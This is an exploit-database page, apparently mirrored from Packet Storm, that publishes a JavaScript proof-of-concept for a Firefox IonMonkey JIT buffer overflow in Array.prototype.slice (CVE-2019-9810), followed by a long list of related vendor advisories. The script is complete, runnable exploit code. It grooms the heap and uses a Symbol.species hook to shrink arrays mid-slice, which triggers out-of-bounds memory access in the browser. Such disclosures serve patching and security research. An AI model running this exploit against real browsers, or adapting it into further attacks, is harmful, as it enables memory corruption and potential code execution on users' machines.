Lucene search
XuechiyaobaiPACKETSTORM:152251HistoryMar 27, 2019 - 12:00 a.m.
Firefox Array.prototype.slice Buffer Overflow
2019-03-2700:00:00
Xuechiyaobai
packetstormsecurity.com
40
0.966 High
EPSS
Percentile
99.5%
`<script>
let size = 64;
garr = [];
j = 0;
function gc(){
var tmp = [];
for(let i = 0;i < 0x20000;i++){
tmp[i] = new Uint32Array(size * 2);
for(let j = 0;j < (size*2);j+=2){
tmp[i][j] = 0x12345678;
tmp[i][j+1] = 0xfffe0123;
}
}
garr[j++] = tmp;
}
let arr = [{},2.2];
let obj = {};
obj[Symbol.species] = function(){
victim.length = 0x0;
for(let i = 0;i < 0x2000;i++){
gvictim[i].length = 0x0;
gvictim[i] = null;
}
gc();
//Array.isArray(garr[0][0x10000]);
return [1.1];
}
let gvictim = [];
for(let i = 0;i < 0x1000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}
let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);
for(let i = 0x1000;i < 0x2000;i++){
gvictim[i] = [1.1,2.2];
gvictim[i].length = size;
gvictim[i].fill(3.3);
}
function fake(arg){
}
for(let i = 0;i < size;i++){
fake["x"+i.toString()] = 2.2;
}
function jit(){
victim[1] = 1.1;
arr.slice();
//fake.x2 = 6.17651672645e-312;
return victim[2];
}
flag = 0;
for(let i = 0;i < 0x10000;i++){
xx = jit();
}
arr.constructor = obj;
Array.isArray(victim);
alert(333);
alert(jit());
</script>
`
Related
checkpoint_advisories
checkpoint_advisories
Mozilla Firefox IonMonkey JIT Compiler Buffer Overflow (CVE-2019-9810)
2019-04-03 00:00:00
prion
prion
Buffer overflow
2019-04-26 17:29:00
ubuntucve
ubuntucve
CVE-2019-9810
2019-03-25 00:00:00
zdi
zdi
veracode
veracode
Buffer Overflow
2019-05-16 03:58:52
debiancve
debiancve
CVE-2019-9810
2019-04-26 17:29:00
cvelist
cvelist
CVE-2019-9810
2019-04-26 16:10:13
alpinelinux
alpinelinux
CVE-2019-9810
2019-04-26 17:29:00
attackerkb
attackerkb
CVE-2019-9810
2019-04-26 00:00:00
redhatcve
redhatcve
CVE-2019-9810
2020-04-03 14:01:31
githubexploit
githubexploit
Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in Mozilla Firefox
2019-05-05 17:19:02
Exploit for Improper Input Validation in Mozilla Firefox Esr
2019-09-29 07:08:52
Exploit for Type Confusion in Mozilla Thunderbird
2020-04-13 15:11:46
zdt
zdt
Firefox 66.0.1 - Array.prototype.slice Buffer Overflow Exploit
2019-03-27 00:00:00
Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack Exploit
2019-12-09 00:00:00
cve
cve
CVE-2019-9810
2019-04-26 17:29:00
nessus
nessus
Mozilla Firefox < 66.0.1
2019-03-22 00:00:00
Mozilla Thunderbird < 60.6.1
2019-03-29 00:00:00
RHEL 6 : firefox (RHSA-2019:0672)
2019-03-28 00:00:00
osv
osv
firefox-esr - security update
2019-03-25 00:00:00
firefox-esr - security update
2019-03-24 00:00:00
openvas
openvas
Huawei EulerOS: Security Advisory for firefox (EulerOS-SA-2019-1570)
2020-01-23 00:00:00
Debian: Security Advisory (DLA-1727-1)
2019-03-25 00:00:00
Mageia: Security Advisory (MGASA-2019-0131)
2022-01-28 00:00:00
mozilla
mozilla
Security vulnerabilities fixed in Thunderbird 60.6.1 — Mozilla
2019-03-25 00:00:00
Security vulnerabilities fixed in Firefox 60.6.1 — Mozilla
2019-03-22 00:00:00
Security vulnerabilities fixed in Firefox 66.0.1 — Mozilla
2019-03-22 00:00:00
oraclelinux
oraclelinux
firefox security update
2019-03-27 00:00:00
firefox security update
2019-03-28 00:00:00
firefox security update
2019-07-30 00:00:00
exploitpack
exploitpack
Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack
2019-12-07 00:00:00
kaspersky
kaspersky
KLA11453 Multiple vulnerabilities in Mozilla Thunderbird
2019-03-25 00:00:00
KLA11450 Multiple vulnerabilities in Mozilla Firefox
2019-03-22 00:00:00
KLA11451 Multiple vulnerabilities in Mozilla Firefox ESR
2019-03-22 00:00:00
redhat
redhat
(RHSA-2019:0671) Critical: firefox security update
2019-03-27 07:14:51
(RHSA-2019:0672) Critical: firefox security update
2019-03-27 08:48:21
(RHSA-2019:0966) Critical: firefox security update
2019-05-07 03:37:57
altlinux
altlinux
Security fix for the ALT Linux 10 package firefox-esr version 60.6.1-alt1
2019-03-23 00:00:00
Security fix for the ALT Linux 10 package thunderbird version 60.6.1-alt1
2019-03-26 00:00:00
suse
suse
Security update for MozillaThunderbird (important)
2019-04-04 00:00:00
Security update for MozillaFirefox (important)
2019-03-29 00:00:00
Security update for MozillaFirefox (important)
2019-03-27 00:00:00
debian
debian
[SECURITY] [DSA 4417-1] firefox-esr security update
2019-03-24 20:16:07
[SECURITY] [DLA 1727-1] firefox-esr security update
2019-03-25 13:12:34
slackware
slackware
[slackware-security] mozilla-firefox
2019-03-22 21:29:01
archlinux
archlinux
[ASA-201903-14] firefox: arbitrary code execution
2019-03-23 00:00:00
[ASA-201904-4] thunderbird: arbitrary code execution
2019-04-06 00:00:00
centos
centos
firefox security update
2019-04-01 19:07:32
firefox security update
2019-04-01 19:05:36
thunderbird security update
2019-04-01 19:08:08
ubuntu
ubuntu
Firefox vulnerabilities
2019-03-25 00:00:00
Thunderbird vulnerabilities
2019-03-28 00:00:00
ibm
ibm
Security Bulletin: Multiple Mozilla Firefox vulnerabilities in IBM SONAS
2019-07-08 08:55:01
mageia
mageia
Updated firefox packages fix security vulnerability
2019-04-05 21:12:59
Updated thunderbird packages fix security vulnerability
2019-04-05 21:12:59
exploitdb
exploitdb
Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack
2019-12-07 00:00:00
thn
thn
amazon
amazon
Critical: thunderbird
2019-04-25 16:37:00
gentoo
gentoo
Mozilla Thunderbird and Firefox: Multiple vulnerabilities
2019-04-02 00:00:00